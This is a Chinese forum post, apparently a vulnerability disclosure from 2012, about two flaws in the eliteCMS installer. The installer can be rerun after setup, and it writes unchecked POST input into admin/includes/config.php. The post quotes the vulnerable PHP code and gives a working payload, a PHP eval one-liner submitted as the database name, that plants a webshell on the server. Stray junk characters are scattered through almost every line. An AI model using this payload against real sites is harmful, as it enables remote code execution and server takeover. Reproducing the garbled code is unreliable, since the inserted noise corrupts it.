eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
, i, ?& Q4 l5 H6 x- j
& P: Q; G: k, ]- e i: {, V另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
( s/ i9 b9 w5 U5 W我们来看代码:$ S `+ k3 A$ L/ K
0 D) M! U, Z& i" t/ b6 Q...
" C h% W$ @0 R/ S) a% s' C* helseif ($_GET['step'] == "4") {( m3 E; R& ~+ r1 G, q( {6 c
$file = "../admin/includes/config.php";
7 @7 s% E4 x$ D$ D2 f, ?/ J $write = "<?php\n";
8 _8 J! @$ H3 P {% ?) J5 I" ]/ n/ g $write .= "/**\n";) N) t2 W( ~- k1 Y, N$ U
$write .= "*\n";# h& C; p) `1 R8 X7 B
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";- m' J3 n+ _- h1 v7 y: Z
...略...
4 h) Z% H1 t* o5 W+ F $write .= "*\n";3 J( a) r7 u1 W9 f+ ?
$write .= "*/\n";
9 S" d: M. h4 @6 j* Y5 r $write .= "\n";9 s5 I" F$ P4 F& U9 o& E
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
% F- ]9 D( x) ]% S& | $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
% q5 }# }0 n3 C; Y $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
* b6 _+ m& n# l/ T; V2 u' u $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";. o2 |/ I/ t3 D
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";% T" a* e& ]6 H! g+ C* @1 z
$write .= "if (!\$connection) {\n";+ {0 b2 v6 f% W3 \2 E7 o$ w, h
$write .= " die(\"Database connection failed\" .mysql_error());\n";; W: ~( s; S) S4 z7 [: ~
$write .= " \n";$ u3 Y3 |% f6 I* B! B* r! G
$write .= "} \n";
. l+ S: J' D! G3 x$ N4 u $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";* D+ ~* o6 Q- L @5 b" T
$write .= "if (!\$db_select) {\n";
- _3 X) s* g( j( q $write .= " die(\"Database select failed\" .mysql_error());\n";' k8 j+ E4 z" W# {2 U* c
$write .= " \n";
4 x8 x/ y" `' Y( E; Z3 \" J4 Q1 Q $write .= "} \n";
: X% M+ z9 i7 v $write .= "?>\n";
4 B0 d* n% h( V2 f* g 4 y P: d1 H. O( ]
$writer = fopen($file, 'w');
* h: c7 S. S2 X: r' B; c...
+ O$ _& k' u. S% ~/ i1 L
: \" D C- f- G6 o1 D) v在看代码:
4 w L& R2 H' G" z$ K6 h! m
2 g j3 C' [$ ?( E$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
0 z+ X3 T$ D, S H, R$ L# Y: X0 d$_SESSION['DB_NAME'] = $_POST['DB_NAME'];, Q$ G V V! V; F) g- ]
$_SESSION['DB_USER'] = $_POST['DB_USER'];; p* C; m; S) c
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
7 e' T+ c6 K2 o4 }, k! q , F: ^9 x0 b& N( K
取值未作任何验证5 x. ]% ]0 |6 j; a% ]7 o
如果将数据库名POST数据:
6 {( x& D2 v! a
2 e+ M8 X. z1 C5 K& d"?><?php eval($_POST[c]);?><?php
) L- ?; o g# C7 f y . V; e3 P" f/ ^9 p
将导致一句话后门写入/admin/includes/config.php
4 a( K" ^/ Y: |- Q |
发表于 2012-11-18 13:59:27
收藏
支持
反对